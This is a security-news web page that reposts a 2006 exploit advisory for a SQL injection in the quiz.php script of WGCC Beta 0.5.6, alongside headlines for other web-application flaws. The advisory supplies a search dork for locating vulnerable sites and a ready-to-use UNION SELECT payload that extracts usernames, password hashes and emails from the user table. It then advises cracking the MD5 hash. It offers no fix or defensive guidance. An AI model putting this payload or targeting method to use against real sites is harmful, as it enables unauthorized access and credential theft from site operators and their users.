Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Power Phlogger 2.0.9 Remote|Local File Include Vulnerability

  phpPowerCards 2.10 (txt.inc.
php) Remote Code Execution Vulnerability

  Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability

  Active Bulletin Board v1.1 beta2 (doprofiledit.
asp) Remote User Pass Change

From:ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:23 октября 2006 г.
Subject:WGCC Beta <= 0.5.6 (quiz.php) Remote SQL InJection Vulnerability

# Title  :   WGCC Beta <= 0.5.6 (quiz.php) Remote SQL InJection Vulnerability
# Author :   ajann
# Dork   :   "Web Group Communication Center beta 0.5.6/0.5.5/.."
# Greetz :   Tüm, Müslüman, Aleminin, Ramazan, Bayram., MUBAREK, Olsun

-->Login Before Injection

[Inject]]]

### http://[target.com]/[path]/quiz.php?action=show&qzid=[]SQL INJECTION[]

Example:
quiz.php?action=show&qzid=-1%20union%20select%200,0,0,0,username,
passwort,email,0,0,0,0,0,0,0,
0%20from%20wgcc_user%20where%20userid=1

++ userid=1 Change This

Crack MD5 HASH

[/Inject]]]

#ajann,Turkey
#...

#Im Not Hacker!

# milw0rm.com [2006-10-20]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород